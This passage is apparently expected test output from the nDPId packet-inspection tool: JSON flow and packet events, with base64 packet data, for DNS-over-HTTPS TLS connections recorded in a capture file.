S5B1\/8QVYIWJEDBUBgNVHSAETTBLMAgGBmeBDAECATA\/BgsrBgEEAYLfEwEBATAwMC4GCCsGAQUFBwIBFiJodHRwOi8vY3BzLnJvb3QteDEubGV0c2VuY3J5cHQub3JnMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmwuaWRlbnRydXN0LmNvbS9EU1RST09UQ0FYM0NSTC5jcmwwHQYDVR0OBBYEFKhKamMEfd265tE5t6ZFZe\/zqOyhMA0GCSqGSIb3DQEBCwUAA4IBAQDdM9cR82NYON0YFfsJVb52VrlwSKVpRyd7wiQIkvFaH0oSKTckdFEcYmi4zZVwZ+X3pLxOKFHNm+iuh53q2LpaoQGa3PDdah1q2D5XI56mHgRimv\/XBcq3Hz\/ACki8lLC2ZWLgwVTloyqtIMTp5rvcyPa1wzKjmMx3qOZ5ZQcryyj+OhZSgc5SDC5fg+jVBjP7d2zOQOoynh+SXEHBdGxbXQpfM8xNn6w48C97LGKd2aORbyUbL5CxGUY99n4bpnqHuaN6bRj6JaWRhxXg8hYvWLAGLyxoJsZLmM3anwz5f5DtQ0oSRE5vc3oo6qSqbntMfYfd4MkCRKeHr8M0W7RCFgMDAhcWAAITAQACDzCCAgsKAQCgggIEMIICAAYJKwYBBQUHMAEBBIIB8TCCAe0wgdahTDBKMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5jcnlwdDEjMCEGA1UEAxMaTGV0J3MgRW5jcnlwdCBBdXRob3JpdHkgWDMYDzIwMjAwOTA0MDA0OTAwWjB1MHMwSzAJBgUrDgMCGgUABBR+5mrncpqz\/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7\/Oo7KECEgMMokdOfCPCyeubYMusjXM0tYAAGA8yMDIwMDkwNDAwMDAwMFqgERgPMjAyMDA5MTEwMDAwMDBaMA0GCSqGSIb3DQEBCwUAA4IBAQAoMB1ePZKC8NpTy2434kCI6h8NAXGSDejnRZYFr2QSx+TpoZipUWbMWCq8UzrMIxKC8UJACJQc6RIM+Xgz0ZRbGx25OD3V4vLxsczn\/nEIsXCHGvGoEBJqPqesQfpmU9r+oB2CbUgxGaJxDFqnidG6tH5KNxFVbrX2lPzXeDzKwLN1eUiZU\/lMuAOJwkK8zmwVXP5H7g6aco+MiZp06K8b\/Da3w0YGUY9fjEablMtV5ViuxARhZw1pWYWZo\/jGfvICDNvPKmx8V1X1Z4R8rNjm8UiPRR8P0NarasVvNtWs+6fXGpl\/hFMZzj6z4oAVh0vYNXKYxmaDs8l6pH8OOZ\/cFgMDASwMAAEoAwAdIBuLZjnTB3Kjce7+mNxfaBiRgPo4iNkyTjzm6+fh98MBCAQBAAD35z4OurpaleuYyQXrRwgunZx5itw99f\/qns7fqVRPpCakkPBqYtIkrAQds7t3x9gcyB3pN\/ek7QU4lXsRRnsrWpFsVpkkgouj8noQcYPmvp55cuzOEjLxYK5KOB1bU10ZmdANW3hMqgjTathZk6jfjNOD8MgF15uckgPUXOITOpG7UYd\/YtxRx7xgMGY0jlH\/+xeUF+NSAiy6s9oSi0oU\/QlatPOidPhVmRC84vWQNkgJhZubcKWseKLjiRRL9zUmMJ2fjig0R0EKUVh0pAUSNWsA0m3x1YIPV6kX\/fzGNkCBx4kijVkxENgEgAD9si+WguAjMtSH5qQYN0CMxwsWAwMABA4AAAA="} +01308{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":471,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946739400702,"flow_last_seen":946739400727,"flow_idle_time":7560000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":3817,"flow_avg_l4_payload_len":1272,"midstream":1,"thread_ts_msec":946739400727,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"9": {"risk":"TLS Expired Certificate","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","server_names":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=jarjar.meganerd.nl","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"17:C9:8C:F5:DD:1F:0E:0F:DC:C5:42:4F:ED:C4:CD:57:5A:5D:7A:4F"}} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":486,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739401864,"flow_last_seen":946739401864,"flow_idle_time":7560000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739401864,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00855{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":946739401864,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":946739401864,"pkt":"REREREREZmZmZmZmCABFAAFMN1VAAH4GvigKAAABX9jlmatwAbtGU6iimu8Jz1AYAfYHbQAAFgMBAR8BAAEbAwOH23fm3DrJaQXLovxzyYyk5R\/PesPVPPqPMsnNPw9NhCA+BKUjIeM9NnmcNXI7jO56RaAWoMnCcXIJRfPvBK89HQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACsAAAAGwAZAAAWZmkuZG9oLmRucy5zbm9weXRhLm9yZwAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACAgB93oNekrupxQPrzRHifFos9GGTUaOGYLuLqXCSqLFg=="} +00915{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":486,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739401864,"flow_last_seen":946739401864,"flow_idle_time":7560000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739401864,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fi.doh.dns.snopyta.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04384{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":946739401922,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739401922,"pkt":"ZmZmZmZmRERERERECABFAAuALHhAADcGBdJf2OWZCgAAAQG7q3Ca7wnPRlOpxlAQAfURoQAAFgMDAHoCAAB2AwPibR+Wkzsx56DJDm5Eu1YLQR+8sKrid6w\/L4hLlzFi7CA+BKUjIeM9NnmcNXI7jO56RaAWoMnCcXIJRfPvBK89HRMCAAAuACsAAgMEADMAJAAdACBuK8qBa63Irnemz8DqNJ321mRXUwu2HpEN9mUutJb4PxQDAwABARcDAwAkUOaHYP5iZ2NNWAzfU4nuMAsSlIi3Xu6evUH+ePghzyW3lf1oFwMDDTdyOxvGAqdaXqn7mk56YQOkftztBpxUe9++1VUjQL0UTPE4dDghDlADUJrVIMNoajw7OVNVUJlwwZLv4SY0Vx3I7ELfEhgQAcbo8KTKAm9O2ms4MsOpGyCQp3Ck5bHL2bE4iiWi1kZ3XUOEqkWhVOIsnrRavV3YbdvOPn4o+EZD19BNo16d7FYA9cwlYFl0b+UOCHVkbAV5Ro0aksFmIDr9nN\/SKS5iC8KA1HQko\/XCtoZt\/uj26L8Jnm5j0xvi5PCt7eYN7FAf9foi+urRIknTbj0qt5H6t5n2fn2SPs3+74zq4arLW6Grk5JVfjN+EFn6r2Kqt2DBASpVLNRJlEJ\/bKKlz+O8J7CBDjbsuIjIaIhIezaNNWlBddC5u8MicCjaXDfeK0Y4HdjfUV3F5+ceyWCg99LhDO6xG0CeQL6QAIRHV0AxoEVRoc\/2vMJczsdaR6IckxN7UiFIufmha90IusH6BRII8ooR6OU8Y+2rZzYh5iUJTMhKuwIGbOPxF0ajku7y5uTYXkibFy\/3YRErBGtPfTP8lfcsC0F+hSBQLoIlrMlmFjzaT8UDL1Fvuj09G9ZfRK\/xhCkh\/7LpCMAmZL6FGK8dmeyLYWLMckLWasSF4SpcTPWxHh7bEgM8pdQOrhyOwV2+YyGE03XoHny98Ri5sKrhPxH0mGzGNnfYcuH6skZHVwAgYnBYfjM2lceI\/e8LUGXM+\/wIkpWQtiAxj5n9jqC6nREJd3P5hFhhc0S7dmq+lc8Ma343e0W1q85dFAt5euDl0kwrHQBD26Gn0UFzkp+rMUWqJmbE4SEGibShhwSALXJQIigpcGwGc5IATb5iv3WP28Ditv7SIopWvMI9EzLxDQqdqFyPqSJV1GQA4imlHzXCdMmJY\/F6D02T5M85XegGn9Uw4gKTdpJtNdQMeDpMCJmwPpp3X9pZUOt1oTofSb+42UBMYdGAmqh\/lucphpoooHZAFYzgka8EA3+5grzvvRKo1W30cuUHEkcEYum5QQBIn5p1pvfjSQasw1NoCcIklAiODFbTUw\/XBBzGVXrXLo+F9mr5HZJoE6PhrzpGbM+TbC9rdnXfxtb3I6K\/1AuBezoFfnGsw9Dx8ypoJ2UB3C5fLrpS2ieFOMX42\/Dh6ibKZmCZ2IU\/pKi9Kpxz6Ld6HAwuoH4Me9ywi7Ln36mC5YB9\/TIfNIYZgMETrU\/MCg2bIGnZ8vBftq4oKoZH5CfsoxNFs2PFEG\/5CVigap\/tCrH2NE2mXjfyEkFGiVnnGzcQq0blObS7iaq5g9ULTtsStUYEWVhOXk\/yHu5D3\/u6I0Omh\/4izYUAvc\/ASGJ3mfA9dMkNtOEG3hZYmo5CA9GnSRpy2RNoU8Pnf1XinGwNO1Gx8Pk+Rv6O6rF61GXd3j8LIla3tC+sE1vn8o1HuVrg0vtx6svaMmP8iNm4OXIuTyI0c3BbAjgOOu1kSB8ysQJy2HfJ8f+33ewV4FsqQND6r5bZILZFNT6hlGwEaOaKRgd8Dnd4N9fsicUPP3uwhfe3QdvqzyV7OOrXV1IVMp9zwSZ0pMfc8VWLEkiJAKnWpdefyOUExkz5+iOPBxgjTOCDXI2cxb6a85tRWFrVYfRjxQzYvDOiZkMdWovVcpGmC70Cf9f8rBw+ttYEmVtXQq6aUTGji6XfZ4PQSD6aFRmGvyCQ+CTuysuZPRTT+5cBQgpxWr3YBN+426lIaYsxvZASckGkJyHw7wpODlcoQhARdIU2IKEFRJvw6DT5X9zlpEEie0WCTVJ\/dO+1+JbTJMju5fx4Qacw2bdHAKBR6bgpX06u1h2Q89XiuB5q4CfjBycr3kVeONIM0plxcqhvNckbcicJV\/JrJUajfW3F3ZFA8QjvfJykVgp6OKAIPXZNUHoSa3jNomftQSYqyBfMezehknXHShl6ZuQM+Lvb\/uVlinF17iXo2SvKnezJm3fj5cHaM4wuZjkDVCLAE\/Nyn58e9ksRwhD\/gK97rjgBNP1ml+iaYZj1YbBsIP0G755OxhWhcssAbTkI8hBniALaUqQLLPs72nFgtfIXuPTAuoXoMJT42ulwoxGs43\/GTmjksUYpRygFZP5B0dC11WQeR8PhWFcDRYGLV7beAlYwch7ld5nUdJC5mrDnIj419\/n346cz6AR7+0Rr1O5IOtvdQctvdWRZfPDcKiKYfWWWQsFX4uwaKZ7iAJIc3Lf2Hi65\/5WG2H6DXV2pbdFmOOEMbCE9vzIalbNO5yuH17ffgvNYeseN8QYcMc1RjXhkpanOQhCXFt4LROEa0cWaGgGU8KVcV0lHoP38Yqy9\/r9NNO4BBtoRTZYqyQ2KiKQOeL\/DjGmqmnMdtRKO3G2+28PYYcreNlQFUQC1YZRjis96nJONLOoYWGmJ0Ajkc88jEcPUWJ+sQ1Ellx00rNPIeTKszE7eeP1Wj7159+psV+5ymtU7Wt8kdIG49kp2vIgkZ9Wr8jWgezRdBIRoNkNszLOkziHLmtjo71cfnALRZTzE3WjtfCQAqXYkE67df0jceQto9+YJvgwPL7SKReSla4kC23BVgPVvhUiIRAomTXxQfxzJl60MjaMhKYx8sdY8yirN79hBVxNOKvYgeXSM9ea5v58WsOsjoz8vxu1i6IS+wpQDUJRL5+7QRTbXkU\/IgZJ2JwIpYJc0TbCcC+KyzLGP46kWX4\/BnWI6G+lC3q+tZ9lzQmQowB2OgB76ZZzVRvbALuU+R4sPYYq0cv634FKIpwY3EtlYdlCLWfp7ZlgIV62ujlYvHhZTRnGetjI9EyQMIK7XK1fm0YXedSc3g1l5p3dkHYgG0bAtbWa59V3\/IoYFT00HruXjbYzC5+RMiqTRk0M0TGZSrhfPeJjn02Zk7jMnppUxVbahEe2he8Uscmty4roTPIhZyQUTcLmzDMG3cPUpihzyQpbl0WSI0dX58QFWhZM7xH+JJmJ8yAAlZtScWFT+AUyElBRyoWx1bFwnu5cjcTiBOKcIA77CG8sc2sMV00Vn5xS5qVm32olnJkfc6ppnqNQxjiR9wVkT49+iYCtbdmX6IKyWQeVFgUqJQ5BvdNdt7w7dJUeuhPf3VRpEO\/JuTbLlvGkK\/mwXyq24LF3XMtkm5t69hBaSeNohEZao6QmYxZ+NYvxyXtLt2f77PL2m3kxOteUzIZiuV3nkbaSTk55VWkCshKS7HYDGARWAphsf+0I+2o6\/uoYI0UX5N6tebXNoxQAq6JRpkCJZ\/PM5xuxlj\/WGjyfe87wS7vqJa3nEKMo793Ew3S5oj8lEIMcctbFE7wTV1TjUaweZw+Z3iwk0WNd4mhDiOEObjosKaAJZJCKcwHWWPj3Pv6sHr9LXFpkSQghXzPF88XInFPHMmaNePQ5+SQ27ys1WSoLOzvUvoiLb3ySSw3OKanqLRonKV7Zpi0Ytvm7fQizCZ+5Ne\/y\/c1MIzQYpj0KO81JwrZo2y2Ztgzyet8\/H8T5HbkOQKczJbxrmsEvEXSl\/OZ3PT4cobEGmH79r1jJnga64YFXN1twHKTB5tOqayNYoY8HWJExA6ECQm2d8vIM6vU7wGAu00l0do6yKY07icxt6ZdPJ5cHBwXXmOf03M\/8KffX9hGO6Tv76sw1+cR37dJRviYmME\/l8otZxWSrf"} +00957{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":487,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739401864,"flow_last_seen":946739401922,"flow_idle_time":7560000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3196,"flow_avg_l4_payload_len":1598,"midstream":1,"thread_ts_msec":946739401922,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"95.216.229.153","src_port":43888,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fi.doh.dns.snopyta.org","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +02088{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":488,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":946739401922,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1246,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1246,"pkt_l4_len":1212,"thread_ts_msec":946739401922,"pkt":"ZmZmZmZmRERERERECABFAATQLHpAADcGDIBf2OWZCgAAAQG7q3Ca7xUnRlOpxlAYAfU2WgAAHSeqZDGEXrFb+J1opG1dnPi4zgteeVslY9ZmFJlRTMTFOW+365tsM\/eWSLFN26wQY3yg0Y1FR+FA00qPga4\/wX0RoMfU+SI0dBiZB1tmIlqRr+vkKc2KX7jGL6yH9pbjNmGWfzy9B2zla2g4HVLW8pCqD27lbyw+DGZ\/hO2inmJfO0WMCDqHjCOm+F+BP64YRotqRni9BCcdPp\/FvRYRcX4k5KVXiCE2z69wUVsqPG1llKJj1CFH\/RsTm3g3KbtdQU0GjyNyQl2CDpurTyUPQ92fUKA\/X0cBMPJgzHC0dOP90IUWPM1DD3nsbrNmpz8lP9N79mRwF5LTOHbbfvAKtpN8hLwkt9ukwyBmXk8C+zmVLmgKdtBBeCiCgbaFL\/aA+J\/nNJ3jy0mYq5nUvVXTh2Z7\/bG7F7D15e+NHDTFMXBqoMonQB16IlIlFtAJa+1TB8nMDEieCqXSm2meI\/wkXXc32Srtv3AtM6vxPAOrV+x9rponJ6AacvE6\/cmUC4WCIDgujE5nGZYcMZSggbR9\/Kt6utpNlB5VFi1pEVrNaFZHw7aT6\/CtVG+zVSwvyQk0KhE6erbsuDtzZMxLvCtcsV6pPfC\/PRbO03YGJv8DK8LahvowpjPqbaymGAnYP9bBjmcj8Zybby5MtwMog5KW7YAI9rBYlENeM2Dy3vHARJIR5GB+j33qs5hvPkWTV3o9HKuDltN6e\/7cTcTid6DRvXmO1ZA7RcWnp1v9dX0nqCg+iwrqPJuk36pRQQSp3pYE1EAHLCzt3501t+KApLCxYzEbirRWptNyoeeEE5uOfBxYTM2WMleevobNDlfBM03M0aFglzGS3lCRV0yNWw\/ZBGahRO+XjHuBA+QxkBjzNIYvhBcDAwIZaqpl7KO\/aoS\/xaq63oePn\/l4wkgopi1lsaFYbJflvn5lJQcRSZHGqRIptAjGXWny5qRxC7sgGucrDoA5XZJpJ5rL1sQGrNBBnHYCcdhfkRgu0iYOklGG9xE+slZId49jcsAtWEU2I\/eEF\/gzGmcDoIKW9\/IU0pMNXTdWiWofVVPUZs\/Lb\/bN8htmbbfjLuBzEKhZpgveVlZPj5VXAuHEhXXk0ROaGAVglMZsxHsbdDUcKPQjQ9mHgMzqt\/SN4SKDhA1+9LRLSL4g\/ZmJxnsYsJZiPRXZLdaU9Cy+A4CQPYNfuO+XNekAtQHOOCFWcDjdfU7K6gPp+jdG+6zR71EFMeiGo9di5FuI+fsXGMjNiflcFg3\/oiEiQj+c+SXhXmg5cUUmZisM56tSTYoDbqV2I0clprpOcfYkTtT92I6EUzloL7npuW1zLxMXE7nwW5JzyWrlx3xaz6AAfotCwxm5ob\/ht48eMSnaGsDmVMmIKcAeXj9r\/Qgfm5ydj17A\/wWCVm\/7gADpBdFs4VTLiVB4jIonZRHnx0E40hyOWZIsEIEnMxJxrW8PkRcFDV5sXdcHtfh7iWchE466qSDTtK21gAz66LAGzIzDSi4jTfEAt1SbNYQ4BmQyjL19w9SMP8BzTvwsIFe6hnwpATT+7somRA\/Z26b4QEU5K1DZ7oOX\/WGJvzzyrIbd4MSiv77t6sgdhQ=="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402059,"flow_last_seen":946739402059,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739402059,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":946739402059,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":339,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":339,"pkt_l4_len":305,"thread_ts_msec":946739402059,"pkt":"REREREREZmZmZmZmCABFAAFFMVtAAH4GEoIKAAABLuPINt7iAbvHEJB+u++XVVAYAfa5DQAAFgMBARgBAAEUAwMZSog080zqV7Jj5Dvb3ndcTDVXiuYN2\/F4nl5oM8685CAD8\/DpQOi68rj3Dpf6v96RxtLLH4tYGgdf5WLODM4bbQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAAClAAAAFAASAAAPcmRucy5mYWVsaXgubmV0AAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIJ7aJCDYGU5kBdEWwbRqPCTJbp2+gk2aiKbS3L7SQcx7"} +00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739402059,"flow_last_seen":946739402059,"flow_idle_time":7560000,"flow_min_l4_payload_len":285,"flow_max_l4_payload_len":285,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":285,"midstream":1,"thread_ts_msec":946739402059,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.54","src_port":57058,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"rdns.faelix.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +04403{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":504,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":946739402097,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739402097,"pkt":"ZmZmZmZmRERERERECABFAAuAZpBAADcGGhIu48g2CgAAAQG73uK775dVxxCRm1AQAfXDSAAAFgMDAHoCAAB2AwMvYFLfcaEHo3aJMGXc3Nj5JHcSpejvVC+OlDWKY+lERSAD8\/DpQOi68rj3Dpf6v96RxtLLH4tYGgdf5WLODM4bbRMCAAAuACsAAgMEADMAJAAdACCh186lBtHTNByoJBA0po27dnFNUREe5HIPKtcxu6S2dhQDAwABARcDAwAg9o2cPZarHTdrUnIxRn1VCbJHnvCJutGQQOHJwtgi\/RAXAwMOr0yaSOXTVxNy1MdOCL2l0VNtPnwh1Pur1Peod0tJjP9bgm\/AXbCeom1NL8K2T1J0dOI2RGuShy8YsyfJSw5Wmm071ESTozks9\/pWNhc8EY3OZk6mCQg3Q3y0vd4NtUzxexbQ\/ljBYll7ps6UiVrepG46JDr3EaPIsRJxAZ8gk2GaeDNtt7RJ53LkT05zfjvHMA6aBmH7t2BOZWkMQkrXRLmYtnSacXrlIzcJzUpGVRU0MO5jJX8g6q6PFhL59lDZu8Wsxk4Ijhyg4K8UnAjzRt0sqrXp6a0SqTxPZDzAPdhdwet3y+1QvN+aCu84nNSfCfN63IrHLSK6g6E3lem15SKv2YkiXF084ouwYBCBJXJ0DejPRccdH+Bp7CthOdZD9VLsoaB6QmK0BYE+B3JLwPXFYwO17RILfiGHekeCLv1KycofjSKkrY8yMabLa35ij5iLlwpIadsWJnwxXtZhNE88TO3LP+8rk3SThdBjlwIn02grC3P5DVdRHQUuYvIj+XumPYY4OniV3MWQD5oVffgmBaE\/MiLcfXRUvAgscquxip1c\/\/iyBNFRLF3RUPwBL5NcLPUAOiX8VC6qW6UmkIisNPyl59sHHQPhjQtTaV3HdBxVSxa+lXvafEDpCFPhfq7Z8DomnjFz314Mo2YICe+ZZ\/VP\/fu7\/DCzGaGMJt\/y8fB\/6C7VSPpretnL2mHkpzqNNsRNJHmpTbExTf\/W0z7d7eRfUyi4HRoWhN1u+9quMVSyao8SZFSb9c6pJV2Cpd+PDnrbNELHRV\/F65mKZXLF2SBEFyPK6XtRb+DOfMx0N6eOXr93S\/6+HvwSpArnHXm2qs+EDh7L5OyLbYX7hk\/pTg3eyPRsiU+T1VKMmTm3HYiEMmPROOISeM2PorfGczBqiAbHiPnaSSCDWzXHHee3yjPZXq9NGQADWivkdXNHAGorqs10ePRotp6azTgDg+3xjhiyUN8\/5\/JSc3Kyd9\/Y7eBwt2u3jJ0Ir1dMpZrh8Xytn\/oFEDmMRBapOHclfLOBBRZGJk+RA7J4ax9KIam6HVgRqufRZ7dV+VdgeVMjYSy4DQHs6oQV1dnsfERFBqYVQdJ93jWD1Gsdc8Pxx1qQ6tb7lnC4UqWJg2j4TF\/4asugxqLUp8iztI1CeTH4Reu1S6K\/rL+\/r1FEIu\/3a\/Pc+80qIi1Y87Z88cA68V6AnrKI\/jRFdeUnKaulroYDyincGpznQ32nbV7\/a8ufW3HqHzuY8Srdsdzg7OWNNr818v6m39ySIusJPgs5uFC9xvx8R+dIpVEYzkh3Q2eeeMG9\/8K2vIPpbbOtWSl8S5FN+69DYbQxN3KXTRYnKAcgBhodqiyj+6scHhaFARQYGoblFVqgXvJu7mshFdDHwBCaC5uowdNEKy4yrw5ottXf3H2NCsu9qcfXXi\/z\/OosB\/qYdcOqltwSq\/80V+8Ge38CLLZRSG\/4XrYzdhVDiFWoHxmaBU5QDEtQZH3S5OWqN1YkEB+FuSwADN6wY1gWAHclaDt280QNrqehBd4CwSsxy7G0qCDy36MMZMs7kf2Vj2TgH2Ktlytg+thkxDKtjS\/3aeMtSmm43ddFCAwkHZueXWUvoZnXP444s3zmu+73i2ZuHERFPrHSjFT+Y1Mpgo0Q6tWu1ilCv3IprR0S6yOnEJ5GH5r1Gf8ZIpGpefh36oorDOpgHiyqyCCd2qxXI8dwpeWwmWx2f1fKIN+bOmeDA+2HTL5b\/h\/S8LxTnnbWVqrgwQxdpAQ1xCVDtsVFko7TfSsPQoikR1NXdGw35qIw15E77U92szex\/zyWrA\/2KGcD2M3u3eNzXjjgmkxW27iRaDVs9Dg00I8PXscfPuLziMbIIt+Qm0SfB\/SFf1ylBL4HammClVdC7YNhrs4NDTvUTrxAf\/9BLynvePRrZvNzUMjBT8JtlvsBmnasO+COXrGwGyL50S3HH+eTrpMH9LMnT\/2nWeiT7sDmyjA9eJmW05\/8DRI8uR2ignlELeQeE7ZYC8KKYreOyXVjuVJO8KRaBbSIU8dUGF\/ILBa6hey1v4zK5JU1MHXOVQdX1RkKit5IUXefBWJ4R0BtjoPPFwKYAfyrsAKBcQzvKsyota24c0cDVjMzge24BKry1Tqr123sw9sTncyGrJzrjJCAkeCEkQo\/KqOKmxNrr6CtJmmIByoS+EjVKjVpJBluAdt5s3qw9VBr\/A44f7M4XZ82OLHYLOdXuuY4Rgtek4oFOa\/eUNUqECm7Y6b272wQZRBWvplBYlD2RWyR8BI01QWkzD2WfZpeGCzTSL5ABcGznl3CTw+DF6WcoeJd6SbUQUUEPVBF4u3zdh9b1Jl9zNuwWauO57o6a9eFR5unb1g++tHtZoIerFI1gyMEkvujqSt\/jK8uIRkRYOGlslTd\/3gwipdTVXxsLWi2fDz9+hxgVNOGQx8\/XNWyG1F\/L1mjtzU1UBNgZmslQP0EHO4J0uMMhguKNrTksx3df79c\/0PdkBKYtPr+8Ipj\/SC3QYRzf0s53zKfkSiObQ\/sOVJpwMvMhEUZunN4GQG+WMzs5eDRzdpQVJe47jiYijmkgXFbUCq004yxOCosLJYnsGKuZDQyE0z4teBgJH8ZC2mVlhO8lAz8gPU5mm5pEBH0gFKqsINKjcIbhVPUHYBlhBeR1erIfe5hsNdbM\/YCyGrep30hH+qZ\/IBF\/s3j2eRJAN56DPG7eQXCsiZSBsk9PTgJ38fSGAbaH0pLxsq2c1